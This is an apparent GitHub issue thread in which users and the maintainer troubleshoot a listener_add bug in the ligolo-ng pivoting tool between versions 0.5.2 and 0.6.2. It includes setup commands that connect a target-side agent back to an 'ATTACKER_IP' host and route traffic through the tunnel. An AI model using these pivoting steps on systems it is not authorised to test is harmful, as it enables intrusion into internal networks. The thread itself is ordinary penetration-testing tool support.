listener_add feature not working in v0.6

[R0ttCyph3r]

i was not able to stop listeners in v0.5.2 so i downloaded the latest version to test out i started a listener and stopped it feature was working fine but when i started new listener to test somethings and to my surprise i was not getting any results

i get connections if port is open on netcat but if it is something like python3 -m http.server or sliver mtls listener

[nicocha30]

Hey @R0ttCyph3r,

Just tested on Windows 10 and Linux (with Python http.server), no issues. Can you share more details?

[R0ttCyph3r]

hey @nicocha30 sorry for ghosting this issue i was not in touch with my pc due to some travels.

can you tell me how you added that it was working i do the following

Our machine

sudo ip tuntap add user [your_username] mode tun ligolo

sudo ip link set ligolo up

./proxy -selfcert -laddr 0.0.0.0:8080

Target machine

.\agent.exe -connect ATTACKER_IP:PORT -ignore-cert

Our machine

session

sudo ip route add TARGET_IP/SUBNET_MASK dev ligolo

start

---

Webserver setup

Our machine

listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:8000

after this when i do

curl http://attacker_ip:8000/something

even if i do it from a browser on the target

i don't get a request on my linux machine

but if the same port is exposed through netcat i can connect to it

[quentains]

Hello there !

Just discovered this project, this is an insane tool !

I experience the exact same problem as @R0ttCyph3r . I see a connection back on a classic nc listener, but the http connection to my python webserver is impossible.

I tried to downgrade to v0.5.2, and this is working like a charm.

I'm using the same simple setup as showm above by the author (tested on a ctf environment with Kali & Windows Server 2022).

[nicocha30]

Are you using the same version between the agent and the proxy?

[quentains]

Are you using the same version between the agent and the proxy?

Completely sure, I only downloaded the last version (v.0.6.1) binaries before trying to downgrade.

[nicocha30]

@R0ttCyph3r

You are binding to localhost (--to 127.0.0.1:8000):

listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:8000

And reaching using the external IP:

curl http://attacker_ip:8000/something

Wouldn't that be the problem?

I tested on every system I could, using netcat and a Python http server, over internet, and I couldn't reproduce this issue.

Can you share me a lot more details? Agent system, Proxy system, network settings, routes, command history (on ligolo and on the systems).

[quentains]

On my end I first followed the README + double checked few Youtube videos, nothing worked.

I'm sure I went for listener_add --addr 0.0.0.0:<victim port> --to 127.0.0.1:<kali port> and then tried to GET a file against my Kali webserver from the second victim box using the first victim IP (in the same subnet as the second internal machine).

I may have the time to reproduce the bug and share more details later today. But I reused the exact same setup with the v.0.5.2 and it worked directly.

[R0ttCyph3r]

@R0ttCyph3r

You are binding to localhost (--to 127.0.0.1:8000):

listener_add --addr 0.0.0.0:8000 --to 127.0.0.1:8000

And reaching using the external IP:

curl http://attacker_ip:8000/something

Wouldn't that be the problem?

I tested on every system I could, using netcat and a Python http server, over internet, and I couldn't reproduce this issue.

Can you share me a lot more details? Agent system, Proxy system, network settings, routes, command history (on ligolo and on the systems).

i am pretty sure this never caused me an issue prior to the latest version i am using the same commands for the past year.

i am using arch linux as host ( where proxy runs) and ubuntu as target ( where agent is running ) i checked the versions of both proxy and agent and tried on windows too didn't work can you share your commands if they differ from mine.

target is dual homed and pretty straight forward networking

[nicocha30]

@R0ttCyph3r / @quentains can you try with the new 0.6.2 version? I reverted to the old protocol.

[R0ttCyph3r]

just tested it's working fine with 0.6.2